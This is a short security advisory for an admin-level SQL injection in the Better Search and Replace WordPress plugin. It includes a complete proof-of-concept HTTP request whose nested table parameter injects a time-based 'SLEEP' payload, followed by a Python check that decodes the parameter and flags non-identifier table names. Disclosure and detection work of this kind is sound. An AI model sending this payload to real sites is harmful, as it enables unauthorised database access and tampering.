Source: wpexploit
Author: Christiaan Swiers
WPEX-ID: 229A065E-1062-44D4-818D-29AA3B6B6D41
Date: Aug 01, 2022 - 12:00 a.m.

Better Search and Replace < 1.4.1 - Admin+ SQLi


EPSS: 0.001 (Low), percentile 32.2%

The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high-privilege users to perform SQL injection attacks.

POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie:[admin+]

bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace
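
A defensive check for the request shown above, as an added example (not code from the plugin or from this advisory): it decodes the nested `bsr_data` form string and flags any `select_tables[]` value that is not a plain identifier. The identifier pattern, the function names and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate table name is letters, digits and underscores only.
SAFE_TABLE = re.compile(r"[A-Za-z0-9_]+")

# Request body copied from the request above.
POC_BODY = (
    "bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0"
    "&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef"
    "%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20"
    "%26dry_run%3Don%26bsr_nonce%3Da66e81c52b"
    "%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php"
    "%253Fpage%253Dbetter-search-replace"
    "%26action%3Dbsr_process_search_replace"
)

# Constructed benign body with the same nesting and two ordinary table names.
BENIGN_BODY = (
    "action=process_search_replace&bsr_data=search_for%3Daaa"
    "%26select_tables%255B%255D%3Dwp_posts"
    "%26select_tables%255B%255D%3Dwp_options"
)


def selected_tables(body):
    """Return every select_tables[] value carried inside the bsr_data field."""
    tables = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key != "bsr_data":
            continue
        # bsr_data is itself a URL-encoded form string: decode a second time.
        for inner_key, inner_value in parse_qsl(value, keep_blank_values=True):
            if inner_key == "select_tables[]":
                tables.append(inner_value)
    return tables


def suspicious_tables(body):
    """Return the table values that are not plain identifiers."""
    return [t for t in selected_tables(body) if not SAFE_TABLE.fullmatch(t)]


if __name__ == "__main__":
    for name, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(name, suspicious_tables(body))
```

The same identifier test works as server-side input validation before a table name reaches a query; comparing each value against the database's actual table list is stricter still.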
